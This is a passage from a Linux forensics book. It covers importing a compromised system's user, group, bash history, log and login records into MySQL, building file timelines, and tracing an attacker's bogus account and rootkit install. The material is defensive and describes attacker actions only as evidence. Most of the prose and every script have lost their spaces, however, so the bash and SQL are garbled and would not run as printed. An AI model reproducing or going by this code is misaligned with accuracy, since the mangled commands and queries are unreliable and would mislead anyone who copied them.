AstutereadersmayhavenoticedthatourscriptimporteduserandgroupIDs,notnames.Thiswasintentional.Whydidwedoitthisway?Ifyoustoptothinkaboutit,itwilloccurtoyouthatwhenyoulistfilesonyourLinuxmachineusingls,thelsprogramisusingthepasswordfiletotranslateduserandgroupIDsstoredintheinodes(moreabouttheselater in the book) to names.You havemounted a filesystem from another computer onyour forensics workstation and ls will use your /etc/passwd and /etc/group files totranslateIDstonames,notthecorrectfilesfromthesubjectsystem.ThisissueisshowninFigure6.9whereallofthejohnuser’sfilesreportthattheybelongtothephiluserbecausethe user ID for john on the subject system is the same as the user ID for phil onmyforensicsworkstation.IncaseswheretheuserIDisnotfoundontheforensicsworkstationtherawuserIDisdisplayedratherthantheincorrectname.

FIGURE6.9

Usernamesincorrectlydisplayedforamountedsubjectfilesystem.

Wecaneasilydisplaythecorrectuserandgroupnameinqueriesofourdatabaseifwecreate two new tables and import the /etc/passwd and /etc/group files from the subjectsystem. This is straightforward thanks to the fact that these files are already colondelimited. Importing this information is as simple as copying the subject’s passwd andgroup files to /tmp (or some other directory MySQL has been configured to use forimports),andthenrunningthefollowingSQLscript.createtableusers(

usernamevarchar(255)notnull,

passwordHashvarchar(255)notnull,

uidintnotnull,

gidintnotnull,

userInfovarchar(255)notnull,

homeDirvarchar(255)notnull,

shellvarchar(2048)notnull,

primarykey(username)

);

loaddatainfile‘/tmp/passwd’

intotableusers

fieldsterminatedby‘:’

enclosedby‘”’

linesterminatedby‘\n’;

createtablegroups(

groupnamevarchar(255)notnull,

passwordHashvarchar(255)notnull,

gidintnotnull,

userlistvarchar(2048)

);

loaddatainfile‘/tmp/group’

intotablegroups

fieldsterminatedby‘:’

enclosedby‘”’

linesterminatedby‘\n’;

Thiscodeisabitsimplerthantheimportforourmetadatafile.Theprimaryreasonforthisisthattherearenodatesorothercomplexobjectstoconvert.YouwillnotethatIhaveusedtheusernameandnottheuserIDastheprimarykeyfortheuserstable.ThereasonforthisisthatifanattackerhasaddedanaccountwithaduplicateID,theimportwouldfail as primary keys must be unique. It is not unusual for an attacker to create a newaccountthatsharesanID,especiallyID0fortherootuser.ExecutingthescriptabovetoloadthesetwotablesisshowninFigure6.10.

FIGURE6.10

ImportinguserandgroupinformationintoMySQL.

NowthattheuserinformationhasbeenimportedIcanperformsomesimplequeries.Itmightbeusefultoseewhatshellsarebeingusedforeachuser.Anattackermightchangetheshellofsystemaccountstoallowlogin.Suchaccountsnormallyhavealoginshellof/usr/sbin/nologin or /bin/false. The results of executing the query select * fromusersorderbyuid;areshowninFigure6.11.Theresultsshowthatanattacker

hascreatedabogusjohnnaccount.

FIGURE6.11

Selectingusersfromthedatabase.Notethebogusjohnnaccountthathasbeencreatedbyanattacker.

IfanattackerhasreusedauserID,thatiseasilydetected.InadditiontolookingattheresultsfromthepreviousqueryinordertoseeeverythingintheuserstablesortedbyuserID,anotherquerywill instantlyletyouknowifduplicateIDsexist.Thequeryselectdistinct uid from users; should return the same number of rows as theprevious query (38 in the case of the subject system). If it returns anything less, thenduplicatesexist.

Isthereanyvalueinviewingthegroupfileinformation?Yes.Thegroupfilecontainsalistofuserswhobelongtoeachgroup.Ifanattackerhasaddedhimself/herselftoagroup,it will show up here. New users in the sudo, adm, or wheel groups that are used todeterminewhogetsrootprivileges(theexactgroupandmechanismvariesfromoneLinuxdistributiontothenext)areparticularlyinteresting.Evenknowingwhichlegitimateusersare in these groups can be helpful if you think an attacker has gained root access.Theresultsofrunningthequeryselect*fromgroupsorderbygroupname;areshowninFigure6.12.Itwouldappearfromthisinformationthatthejohnaccounthasadministrative privileges. The query select distinct gid from groups;shouldreturnthesamenumberofrowsiftherearenoduplicategroupnumbers.

FIGURE6.12

Examininggroupfileinformation.

Let’sreturntothefilestable.Afterall,wesaidourmotivationforimportingusersandgroupswastodisplaycorrectinformation.Inordertodisplayusernamesinourquerieswemustdoadatabasejoin.IfyouarenotaSQLexpert,fearnot,thekindofjoinneededhereissimple.Weneedonlyselectfrommorethanonetableandgivetheconditionthatjoins(associates)rowsinthevarioustables.

Ifwewishtoaddusernamestothepreviousqueryofthefilestablesomethinglikethefollowing will work: select accessdate, accesstime, filename,permissions, username from files, users wherefiles.userid=users.uid order by accessdate desc, accesstimedesc.Whathavewechanged?Wehavegonefromthecatchallselect*toanexplicitlistofcolumns.Asecondtablehasbeenaddedtothefromclause.Finally,wehaveajoinclause,wherefiles.userid=users.uid,thatdetermineswhichrowintheuserstableisusedtoretrievetheusername.Ifanyofthecolumnnamesinthelistexistinbothtablesyoumustprefixthecolumnnamewith<table>.totellMySQLwhichtabletouse.TheresultsofrunningthisqueryareshowninFigure6.13.

FIGURE6.13

ResultsofrunningqueryonfilesTablewithusernamesfromuserstable.

NoticethatFigure6.13showsatextfileingedit.HerewehaveusedausefulfeatureoftheMySQLclient,thetee<logfile>command.Thiscommandissimilartotheshellcommandwiththesamenameinthatitcausesoutputtogobothtothescreenandalsotoaspecified file.Thisallowsallqueryoutput tobecaptured.Thiscanbeauseful thing tostore in your case directory. When you no longer want to capture output the noteecommand will close the file and stop sending information. You might wish to teeeverythingtoonebiglogfileforallyourqueriesorstorequeriesintheirownfiles,yourchoice.MySQL has shortcuts for many commands including\T and\t fortee andnotee,respectively.

YoumayhavenoticedthatIprimarilyliketousecommandlinetools.Irealizethatnoteveryone shares my passion for command line programs. There is absolutely nothingstoppingyou fromusing thepowerfulMySQL techniquesdescribed in thisbookwithinPhpMyAdmin,MySQLWorkbench,oranyotherGraphicalUserInterface(GUI)tool.

Couldyoustilldolotsofforensicswithoutusingadatabase?Yes,youcertainlycouldandpeopledo.However, ifyou lookatavailable tools suchasAutopsyyouwillnoticethat theyare relatively slowwhenyouput themupagainstqueryingaproperdatabase.ThereisanotherreasonIprefertoimportdataintoadatabase.Doingsoisinfinitelymoreflexible.Seethesidebarforaperfectexample.

YOUCAN’TGETTHEREFROMHEREWhentoolsfailyouI am remindedof a joke concerning a visitor to a large citywho asked a local fordirections.Thelocalrespondedtotherequestfordirectionsbysaying“Youcan’tgettherefromhere.”Sometimesthatisthecasewhenusingprepackagedtools.Theyjustdon’tdoexactlywhatyouwantandthereisnoeasywaytogetthemtoconformtoyourwill.

RecentlyinoneofmyforensicsclassesattheuniversitywhereIteachtherewasatechnicalissuewithoneofthecommercialtoolsweuse.Inanattempttosalvagetherestofmy75minuteclassperiodIturnedtoAutopsy.Itisfarfrombeingabadtooland ithassomenice features.Oneof the things it supports is filters.Youcanfilterfilesbysize,type,etc.Whatyoucannotdo,however,iscombinethesefilters.Thisisjustonesimpleexampleofsomethingthat isextremelyeasywithadatabase,but ifyouonlyhaveaprepackagedtools“Youcan’tgettherefromhere.”

Based on our live analysis of the subject system fromPFE,we know that the attackmost likelyoccurredduring themonthofMarch.Wealsosee that the johnaccountwasused in some way during the attack. As noted earlier in this chapter, this account hasadministrative privileges. We can combine these facts together to examine only filesaccessedandmodifiedfromMarchonwards thatareownedbyjohnor johnn(withuserIDsof1000and1001,respectively).All that isrequiredisafewadditionstothewhereclauseinourquerywhichnowreads:

select accessdate, accesstime, filename, permissions,username from files, users where files.userid=users.uidand modifydate > date(‘2015-03-01’) and accessdate >date(‘2015-03-01’) and (files.userid=1000 orfiles.userid=1001) order by accessdate desc, accesstimedesc;.

Wecouldhaveusedtheuserstabletomatchbasedonusername,butitisabiteasiertouse theuserIDsandprevents theneedfora joinwith theusers table.Thisqueryran in0.13 seconds on my laptop and returned only 480 rows, a reduction of over 867,000records.Thisallowsyoutoeliminate thenoiseandhomeinontherelevant informationsuchasthatshowninFigure6.14andFigure6.15.

FIGURE6.14

Evidenceofarootkitdownload.

FIGURE6.15

Evidenceofloggingintoabogusaccount.Notethatthemodifiedfilesforthejohnaccountsuggestthattheattackerinitiallyloggedinwiththisaccount,switchedtothejohnnaccountasatest,andthenloggedoff.

CREATINGATIMELINEAswesaidpreviously,makingaproper timelinewithaccess,modification,andcreationtimes intertwined isnot easywitha simple spreadsheet. It isquiteeasilydonewithourdatabase,however.Theshellscriptbelow(whichisprimarilyjustaSQLscript)willcreateanewtimelinetableinthedatabase.Thetimelinetablewillallowustoeasilyandquicklycreatetimelines.#!/bin/bash

#

#create-timeline.sh

#

#Simpleshellscripttocreateatimelineinthedatabase.

#

#DevelopedforPentesterAcademyby

#Dr.PhilPolstra(@ppolstra)

usage(){

echo“usage:$0<database>”

echo“Simplescripttocreateatimelineinthedatabase”

exit1

}

if[$#-lt1];then

usage

fi

cat<<EOF|mysql$1-uroot-p

createtabletimeline(

Operationchar(1),

Datedatenotnull,

Timetimenotnull,

recnobigintnotnull

);

insertintotimeline(Operation,Date,Time,recno)

select“A”,accessdate,accesstime,recnofromfiles;

insertintotimeline(Operation,Date,Time,recno)

select“M”,modifydate,modifytime,recnofromfiles;

insertintotimeline(Operation,Date,Time,recno)

select“C”,createdate,createtime,recnofromfiles;

EOF

Thereisonetechniqueinthisscriptthatrequiresexplainingasithasnotbeenusedthusfarinthisbook.Therelevantlineiscat<<EOF|mysql$1-uroot-p.Thisconstructwill cat (typeout) everything from the following lineuntil the stringafter<<(whichis‘EOF’inourcase) isencountered.Allof theselinesarethenpipedtomysql

which is run against the passed in database ($1) with user root who must supply apassword.

Looking at the SQL in this script we see that a table is created that contains a onecharacteroperationcode,date, time, and recordnumber.After the table is created threeinsertstatementsareexecutedtoinsertaccess,modification,andcreationtimestampsintothetable.Notethatrecnointhetimelinetableistheprimarykeyfromthefilestable.Nowthat we have a table with all three timestamps, a timeline can be quickly and easilycreated.Thisscriptraninundertwosecondsonmylaptop.

ForconvenienceIhavecreatedashellscriptthatacceptsadatabaseandastartingdateand then builds a timeline. This script also uses the technique thatwas new in the lastscript.Notethatyoucanchangetheformatstringforthestr_to_datefunctioninthisscriptifyouprefersomethingotherthanthestandardUSdateformat.#!/bin/bash

#

#print-timeline.sh

#

#Simpleshellscripttoprintatimeline.

#

#DevelopedforPentesterAcademyby

#Dr.PhilPolstra(@ppolstra)

usage(){

echo“usage:$0<database><startingdate>”

echo“Simplescripttogettimelinefromthedatabase”

exit1

}

if[$#-lt2];then

usage

fi

cat<<EOF|mysql$1-uroot-p

selectOperation,timeline.date,timeline.time,

filename,permissions,userid,groupid

fromfiles,timeline

wheretimeline.date>=str_to_date(“$2”,“%m/%d/%Y”)and

files.recno=timeline.recno

orderbytimeline.datedesc,timeline.timedesc;

EOF

At thispoint I shouldprobably remindyou that the timestamps inour timelinecouldhavebeenalteredbyasophisticatedattacker.Wewilllearnhowtodetectthesealterationslaterinthisbook.Evenanattackerthatknowstoalterthesetimestampsmightmissafewfileshereandtherethatwillgiveyouinsightintowhathastranspired.

Thescriptabovewas runwithastartingdateofMarch1,2015.Recall fromour liveanalysisthatsomecommandssuchasnetstatandlsoffailedwhichleadustobelievethesystemmightbeinfectedwitharootkit.ThehighlightedsectioninFigure6.16showstheXingYiQuan rootkitwas downloaded into the john user’sDownloads directory at23:00:08on2015-03-05.AscanbeobservedinthehighlightedportionofFigure6.17,thecompressedarchivethatwasdownloadedwasextractedat23:01:10onthesameday.

FIGURE6.16

Evidenceshowingthedownloadofarootkit.

FIGURE6.17

Evidenceofarootkitcompressedarchivebeinguncompressed.

ItappearsthattheattackerloggedoffanddidnotreturnuntilMarch9.AtthattimeheorsheseemstohavereadtherootkitREADMEfileusingmoreandthenbuilttherootkit.EvidencetosupportthiscanbefoundinFigure6.18.Itisunclearwhytheattackerwaitedseveraldaysbeforebuildingand installing the rootkit.Lookingat theREADMEfileonthe target system suggests an inexperienced attacker. There were 266 matches for thesearchstring“xingyi”inthetimelinefile.Therootkitappearstohavebeenrunrepeatedly.Thiscouldhavebeenduetoasystemcrash,reboot,orattackerinexperience.

FIGURE6.18

Evidenceshowingarootkitbeingbuiltandinstalled.

Wehavereallyjustscratchedthesurfaceofwhatwecandowithacoupleofdatabasetables full ofmetadata.You canmake up queries to your heart’s content.Wewill nowmove on to other common things you might wish to examine while your image ismounted.

EXAMININGBASHHISTORIESDuringourliveresponseweusedascripttoextractusers’bashcommandhistories.Herewewilldosomethingsimilarexceptthatwewillusethefilesystemimage.Wewillalsooptionallyimporttheresultsdirectlyintoadatabase.Thescripttodoallthisfollows.#!/bin/bash

#

#get-histories.sh

#

#Simplescripttogetalluserbashhistoryfilesand.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<mountpointofroot>[databasename]”

echo“Simplescripttogetuserhistoriesand\

optionallystoretheminthedatabase”

exit1

}

if[$#-lt1];then

usage

fi

#findonlyfiles,filenameis.bash_history

#executeecho,cat,andechoforallfilesfound

olddir=$(pwd)

cd$1

findhome-typef-regextypeposix-extended\

-regex“home/[a-zA-Z.]+(/.bash_history)”\

-execawk‘{print“{};”$0}’{}\;\

|tee/tmp/histories.csv

#repeatfortheadminuser

findroot-typef-regextypeposix-extended\

-regex“root(/.bash_history)”\

-execawk‘{print“{};”$0}’{}\;\

|tee-a/tmp/histories.csv

cd$olddir

if[$#-gt1];then

chownmysql:mysql/tmp/histories.csv

cat<<EOF|mysql$2-uroot-p

createtableifnotexists‘histories’(

historyFilenamevarchar(2048)notnull,

historyCommandvarchar(2048)notnull,

recnobigintnotnullauto_increment,

primarykey(recno)

);

loaddatainfile“/tmp/histories.csv”

intotablehistories

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’;

EOF

fi

Back inChapter 3, our live response script simply displayed a banner, typed out thehistoryfilecontents,anddisplayedafooter.Thiswillnotworkasaformatifwewishtoimporttheresultsintoaspreadsheetand/ordatabase.Togetanoutputthatismoreeasilyimportedweuseawk.

Somereadersmaybeunfamiliarwithawk.ItwascreatedatBellLabsinthe1970sbyAlfredAho,PeterWeinberger,andBrianKernighan.Itsnamecomesfromthefirstlettersof the authors’ surnames.Awk is a text processing language.Themost common use ofawkinscriptsistheprintingofpositionalfieldsinalineoftext.

Simple awk usage is best learned by examples. For example, the command echo“one two three” | awk ‘{ print $1 $3 }’ will print “onethree”. Bydefaultfieldsareseparatedbywhitespaceinawk.Thethree-execclausesforthefindcommandinthescriptpresentedinChapter3havebeenreplacedwiththesingleclause-execawk‘{print“{};”$0}’{}\;.The$0inthisawkcommandreferstoanentireline.Thisprintsthefilenamefollowedbyasemicolonandtheneachlinefromthefile.

ThedatabasecodeisnewifwecomparethisscripttothesimilaroneinChapter3.Itisalsostraightforwardandusestechniquespreviouslydiscussed.Anotherthingthatisdonein this script is tochange theownerandgroupof theoutputhistories.csv file tomysql.Thisisdonetoavoidanycomplicationsloadingthefileintothedatabase.PartialresultsfromrunningthisscriptagainstourPFEsubjectsystemareshowninFigure6.19.

FIGURE6.19

Extractingbashcommandhistoriesfromtheimagefile.

Oncethehistoriesareloadedinthedatabasetheyareeasilydisplayedusingselect*fromhistoriesorderbyrecno.Thiswillgivealluserhistories.Realizethateachaccount’shistorywillbepresentedinorderforthatuser,butthereisnowaytotellwhenanyofthesecommandswereexecuted.Theproperquerytodisplaybashhistoryfora single user is select historyCommand from histories wherehistoryFilenamelike‘%<username>%’orderbyrecno;.

TheresultsofrunningthequeryselecthistoryCommandfromhistorieswherehistoryFilenamelike‘%.johnn%’orderbyrecno;areshowninFigure6.20.Fromthishistorywecanseethebogusjohnnuserranwtoseewhoelsewas logged in andwhat command they last executed, typed out the password file, andswitchedtotwouseraccountsthatshouldnothaveloginprivileges.

FIGURE6.20

Bashcommandhistoryforabogusaccountcreatedbyanattacker.Notethatthecommandsbeingrunarealsosuspicious.

Severalinterestingcommandsfromthejohnaccount’sbashhistoryareshowninFigure6.21.Itcanbeseenthatthisusercreatedthejohnnaccount,copied/bin/trueto/bin/false,created passwords for whoopsie and lightdm, copied /bin/bash to /bin/false, edited thegroup file, move the johnn user’s home directory from /home/johnn to /home/.johnn(whichmadethedirectoryhidden),editedthepasswordfile,displayedthemanpageforsed,usedsedtomodifythepasswordfile,andinstalledarootkit.Copying/bin/bashto/bin/false was likely done to allow system accounts to log in. This might also be onesourceoftheconstant“Systemproblemdetected”popupmessages.

FIGURE6.21

Evidenceofmultipleactionsbyanattackerusingthejohnaccount.

EXAMININGSYSTEMLOGSWemightwant to have a look at various system log files as part of our investigation.Thesefilesarelocatedunder/var/log.Aswediscussedpreviously,someoftheselogsareinsubdirectoriesandothersinthemain/var/logdirectory.Withafewexceptionsthesearetext logs.Somehave archivesof the form<base log file>.n,wheren is an integer, andolder archives may be compressed with gzip. This leads to log files such as syslog,syslog.1,syslog.2.gz,syslog.3.gz,etc.beingcreated.

A script very similar to one from Chapter 3 allows us to capture log files for ouranalysis.Aswiththescriptfromtheearlierchapter,wewillonlycapturethecurrentlog.Ifit appears that archived logsmight be relevant to the investigation they can always beobtainedfromtheimagelater.Ourscriptfollows.#!/bin/bash

#

#get-logfiles.sh

#

#Simplescripttogetalllogsandoptionally

#storetheminadatabase.

#Warning:Thisscriptmighttakealongtimetorun!

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<mountpointofroot>[databasename]”

echo“Simplescripttogetlogfilesand”

echo“optionallystorethemtoadatabase.”

exit1

}

if[$#-1t1];then

usage

fi

#removeoldfileifitexists

if[-f/tmp/logfiles.csv];then

rm/tmp/logfiles.csv

fi

#findonlyfiles,excludefileswithnumbersastheyareoldlogs

#executeecho,cat,andechoforallfilesfound

olddir=$(pwd)

cd$1/var

findlog-typef-regextypeposix-extended\

-regex‘log/[a-zA-Z.]+(/[a-zA-Z.]+)*’\

-execawk‘{print“{};”$0}’{}\;\

|tee-a/tmp/logfiles.csv

cd$olddir

if[$#-gt1];then

chownmysql:mysql/tmp/logfiles.csv

clear

echo“Let’sputthatinthedatabase”

cat<<EOF|mysql$2-uroot-p

createtableifnotexistslogs(

logFilenamevarchar(2048)notnull,

logentryvarchar(2048)notnull,

recnobigintnotnullauto_increment,

primarykey(recno)

);

loaddatainfile“/tmp/logfiles.csv”

intotablelogs

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’;

EOF

fi

Therearenotechniquesusedin thisscript thathavenotbeendiscussedearlier in this

book.RunningthisagainstthePFEsubjectsystemyields74,832entriesinourdatabasein32logfiles.SomeoftheseresultsareshowninFigure6.22.

FIGURE6.22

Partialresultsofimportinglogfilesintothedatabase.

Recall that these logs fall into three basic categories. Some have absolutely no timeinformation, other give seconds since boot, while others give proper dates and times.Becauseofthisitisnormallynotpossibletobuildatimelineoflogentries.Thegeneralsyntax for a queryof a single log file isselectlogentryfromlogswherelogfilename like ‘%<log file>%’ order by recno;, i.e. selectlogentryfromlogswherelogfilenamelike‘%auth%’orderbyrecno;.PartialresultsfromthisqueryareshowninFigure6.23.Noticethatthecreationof the bogus johnn user and modifications to the lightdm and whoopsie accounts areclearlyshowninthisscreenshot.

FIGURE6.23

Evidenceoftheattacker’sactionsfromlogfiles.

If you are uncertainwhat logs have been imported, the queryselectdistinctlogfilenamefromlogs;willlistallofthelogfilescaptured.Ifyouarenotsurewhatkindofinformationisinaparticularlog,runaquery.Oneofthenicethingsaboutthismethod is that it is so quick and easy to look at anyof the logswithout having tonavigateamazeofdirectories.

Several of these logs, such as apt/history.log, apt/term.log, and dpkg.log, provideinformationonwhathasbeeninstalledviastandardmethods.Itisquitepossiblethatevenasavvyattackermightnotcleantheirtracksinalloftherelevantlogfiles.Itiscertainlyworthafewminutesofyourtimetobrowsethroughasamplingoftheselogs.

EXAMININGLOGINSANDLOGINATTEMPTSAs discussed in the previous section, most of the system logs are text files. Twoexceptionstothisnormarethebtmpandwtmpbinaryfileswhichstorefailedloginsandloginsessioninformation,respectively.Earlierinthisbook,whenweweretalkingaboutliveresponse,weintroducedthelastandlastbcommandswhichdisplayinformationfromwtmpandbtmp,respectively.

LikeallgoodLinuxutilities,thesetwocommandssupportanumberofcommandlineoptions.Thecommandlast-Faiwxwillproduceafulllisting(-F),append(-a)theIPaddressforremotelogins(-i),usethewideformat(-w),andincludeextrainformation(-x), such as when a user changed the run level. Running this command will provideinformationcontainedwithinthecurrentwtmpfileonly.Whatifyouwanttoviewolderinformation,perhapsbecausethecurrentfileisonlyacoupledaysold?Forthisandother

reasons,lastallowsyoutospecifyafileusingthe-foption.

The results of running last against the current and most recent archive wtmp areshown in Figure 6.24.This is a good example ofwhy you should look at the archivedwtmp (and btmp) files as well. The current wtmp file contains only three days ofinformation,butthearchivefilehasanadditionalmonthofdata.

FIGURE6.24

Runningthelastcommandonthecurrentandmostrecentarchivewtmpfiles.

Not surprisingly, we can create a script that will import the logins and failed loginattemptsintoourdatabase.Becausethesefilestendtobesmallerthansomeotherlogsandtheycancontainvaluablesinformation,thescriptpresentedhereloadsnotonlythecurrentfilesbutalsoanyarchives.Afewnewtechniquescanbefoundinthescriptthatfollows.#!/bin/bash

#

#get-logins.sh

#

#Simplescripttogetallsuccessfulandunsuccessful

#loginattemptsandoptionallystoretheminadatabase.

#

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<mountpointofroot>[databasename]”

echo“Simplescripttogetlogsofsuccessful“

echo“andunsucessfullogins.”

echo“Resultsmaybeoptionallystoredinadatabase”

exit1

}

if[[$#-lt1]];then

usage

fi

#usethelastandlastbcommandstodisplayinformation

#useawktocreate;separatedfields

#usesedtostripwhitespace

echo“who-what;terminal-event;start;stop;elapsedTime;ip”\

|tee/tmp/logins.csv

forlogfilein$1/var/log/wtmp*

do

last-aiFwx-f$logfile|\

awk‘{printsubstr($0,1,8)“;”substr($0,10,13)“;”\

substr($0,23,24)“;”substr($0,50,24)“;”substr($0,75,12)\

“;”substr($0,88,15)}’\

|sed‘s/[[:space:]]*;/;/g’|sed‘s/[[:space:]]+\n/\n/’\

|tee-a/tmp/logins.csv

done

echo“who-what;terminal-event;start;stop;elapsedTime;ip”\

|tee/tmp/login-fails.csv

forlogfilein$1/var/log/btmp*

do

lastb-aiFwx-f$logfile|\

awk‘{printsubstr($0,1,8)“;”substr($0,10,13)“;”\

substr($0,23,24)“;”substr($0,50,24)“;”substr($0,75,12)\

“;”substr($0,88,15)}’\

|sed‘s/[[:space:]]*;/;/g’|sed‘s/[[:space:]]+\n/\n/’\

|tee-a/tmp/login-fails.csv

done

if[$#-gt1];then

chownmysql:mysql/tmp/logins.csv

chownmysql:mysql/tmp/login-fails.csv

cat<<EOF|mysql$2-uroot-p

createtablelogins(

who_whatvarchar(8),

terminal_eventvarchar(13),

startdatetime,

stopdatetime,

elapsedvarchar(12),

ipvarchar(15),

recnobigintnotnullauto_increment,

primarykey(recno)

);

loaddatainfile“/tmp/logins.csv”

intotablelogins

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’

ignore1rows

(who_what,terminal_event,@start,@stop,elapsed,ip)

setstart=str_to_date(@start,“%a%b%e%H:%i:%s%Y”),

stop=str_to_date(@stop,“%a%b%e%H:%i:%s%Y”);

createtablelogin_fails(

who_whatvarchar(8),

terminal_eventvarchar(13),

startdatetime,

stopdatetime,

elapsedvarchar(12),

ipvarchar(15),

recnobigintnotnullauto_increment,

primarykey(recno)

);

loaddatainfile“/tmp/login-fails.csv”

intotablelogin_fails

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’

ignore1rows

(who_what,terminal_event,@start,@stop,elapsed,ip)

setstart=str_to_date(@start,“%a%b%e%H:%i:%s%Y”),

stop=str_to_date(@stop,“%a%b%e%H:%i:%s%Y”);

EOF

fi

This script startsout in theusualwayand isquite simple rightupuntil the lineforlogfile in $1/var/log/wtmp*. This is our first new item. The bash shellsupports a number of variations of a for loop. Readers familiar with C and similarprogramming languageshave seen for loops that are typicallyused to iterateover a list

where the number of iterations is known beforehand and an integer is incremented (ordecremented) with each step in the loop. Bash supports those types of loops and alsoallowsalooptobecreatedthatiteratesoverfilesthatmatchapattern.

Thepatterninourforloopwillmatchtheloginlogfile(wtmp)andanyarchivesofthesame.Thedoonthenextlinebeginsthecodeblockfortheloopanddonesevenlineslaterterminatesit.Thelastcommandisstraightforward,butthesamecannotbesaidoftheseriesofpipesthatfollow.Asusual,itiseasiertounderstandthecodeifyoubreakthislongcommanddownintoitssubparts.

Wehave seenawk, including the use of positional parameters such as $0 and $1, inprevious scripts. The substr function is new, however. The format for substr issubstr(<some string>, <starting index>, <max length>). Forexample, substr(“Hello there”, 1, 4) would return “Hell”. Notice thatindexes are 1-based, not 0-based as inmany other languages and programs. Once youunderstand how substr works, it isn’t difficult to see that this somewhat long awkcommand is printing six fields of output fromlast separated by semicolons. In orderthesefieldsaretowhomorwhatthisentryrefers,theterminaloreventforthisentry,starttime,stoptime,elapsedtime,andIPaddress.

There is stilla smallproblemwith the formattedoutput fromlast.Namely, there islikelyabunchofwhitespaceineachentrybeforethesemicolons.Thisiswheresed,thescriptededitor,comes in.Oneof themostpopularcommands insed is thesubstitutioncommand which has a general format ofs/<search pattern>/<replacementpattern>/<options>.While“/”isthetraditionalseparatorused,theusermayuseadifferent character (“#” is a common choice) if desired. The translation of sed‘s/[[:space:]]*;/;/g’issearchforzeroormorewhitespacecharactersbeforeasemicolon, if you find them substitute just a semicolon, anddo this globally (g option)whichinthiscontextmeansdonotstopwiththefirstmatchoneachline.Thesecondsedcommand,sed‘s/[[:space:]]+\n/\n/’, removeswhitespace from the end ofeach line (the IP field).Thecode forprocessingbtmp(failed logins)parallels thewtmpcode.

Thedatabasecodeissimilartowhatwehaveusedbefore.Onceagain,theonlysmallcomplicationisformattingthedateandtimeinformationoutputbylastandlastbintoaMySQLdatetimeobject.Someof theoutput from running this script against thePFEsubjectsystemisshowninFigure6.25.Note thatlastandlastb generate anemptylineandamessagestatingwhenthelogfilewascreated.Thisresultsinbogusentriesinyour database. My philosophy is that it is better to ignore these entries than to addconsiderablecomplicationtothescripttopreventtheircreation.

FIGURE6.25

Outputfromrunningloginsandfailedloginattemptsscript.Notethatthereareacoupleofemptyentriesanderroneouslinesthatfollow.

Thequeryselect*fromloginsorderbystart;willlistloginsessionsandselect*fromlogin_failsorderbystart;willdisplayfailedloginattempts.SomeoftheresultsfromthesequeriesareshowninFigure6.26.Inthefigureitcan be seen that the attacker failed to log in remotely from IP address 192.168.56.1 aslightdm on 2015-03-09 21:33:55. Around that same time the john, johnn, and lightdmaccounts had successful logins from the same IP address. The attacker appears to betestingsomenewlycreatedaccounts.

FIGURE6.26

Loginsessionsandfailedloginattempts.

OPTIONAL–GETTINGALLTHELOGSEarlier in this chapter we discussed importing the current log files into MySQL. Weignoredthearchivedlogstosavespaceandalsobecausetheymaybeuninteresting.Forthosethatwishtograbeverything,Iofferthefollowingscript.#!/bin/bash

#

#get-logfiles-ext.sh

#

#Simplescripttogetalllogsandoptionally

#storetheminadatabase.

#Warning:Thisscriptmighttakealongtimetorun!

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

#

#Thisisanextendedversionofget-logfiles.sh.

#Itwillattempttoloadcurrentlogsandarchivedlogs.

#Thiscouldtakealongtimeandrequiredlotsofstorage.

usage(){

echo“usage:$0<mountpointofroot>[databasename]”

echo“Simplescripttogetlogfilesand”

echo“optionallystorethemtoadatabase.”

exit1

}

if[$#-lt1];then

usage

fi

#removeoldfileifitexists

if[-f/tmp/logfiles.csv];then

rm/tmp/logfiles.csv

fi

olddir=$(pwd)

cd$1/var

forlogfilein$(findlog-typef-name‘*’)

do

ifecho$logfile|egrep-q“.gz$”;then

zcat$logfile|awk“{print\”$logfile;\”\$0}”\

|tee-a/tmp/logfiles.csv

else

awk“{print\”$logfile;\”\$0}”$logfile\

|tee-a/tmp/logfiles.csv

fi

done

cd“$olddir”

if[$#-gt1];then

chownmysql:mysql/tmp/logfiles.csv

clear

echo“Let’sputthatinthedatabase”

cat<<EOF|mysql$2-uroot-p

createtableifnotexistslogs(

logFilenamevarchar(2048)notnull,

logentryvarchar(2048)notnull,

recnobigintnotnullauto_increment,

primarykey(recno)

);

loaddatainfile“/tmp/logfiles.csv”

intotablelogs

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’;

EOF

fi

If you decide to go this route you will want to modify your queries slightly. Inparticular, you will want to add “order by logFilename desc, recno” to your selectstatementinordertopresentthingsinchronologicalorder.Forexample,toqueryalllogsyou would use select * from logs order by logfilename desc,recno. To examine a particular logfile use select logfilename, logentryfrom logs where logfilename like ‘%<base log filename>%’order by logfilename desc, recno, i.e., select logfilename,logentry from logs where logfilename like ‘%syslog%’ orderbylogfilenamedesc,recno.

SUMMARYInthischapterwehavelearnedtoextractinformationfromamountedsubjectfilesystemor filesystems. Many techniques were presented for analyzing this data in LibreOfficeand/oradatabase suchasMySQL. In thenext chapterwewilldig intoLinuxextendedfilesystemswhichwillallowus,amongotherthings,todetectdatathathasbeenalteredbyanattacker.

CHAPTER

7ExtendedFilesystemsINFORMATIONINTHISCHAPTER:

OrganizationofextendedfilesystemsSuperblocksCompatible,incompatible,andread-onlyfeaturesGroupdescriptorsInodesNewfeaturesinext4UsingPythontoreadfilesystemstructuresUsingshellscriptingtofindoutofplacefilesDetectingalterationofmetadatabyanattacker

EXTENDEDFILESYSTEMBASICSRunning Linux allows you to have lots of choices. This includes your choice offilesystems.Thatsaid,someversionoftheLinuxextendedfilesystemisfoundonthevastmajorityofLinuxsystems.ThesearecommonlyreferredtoasextNfilesystems,whereNistheversioninuse(normally2,3,or4).Theext2filesystemispopularforpartitionsthatdon’tchangeoftensuchasbootpartitions.MostLinuxdistributionsuseext4bydefaultongeneralusefilesystemssuchas/,/home,/usr,/opt,etc.

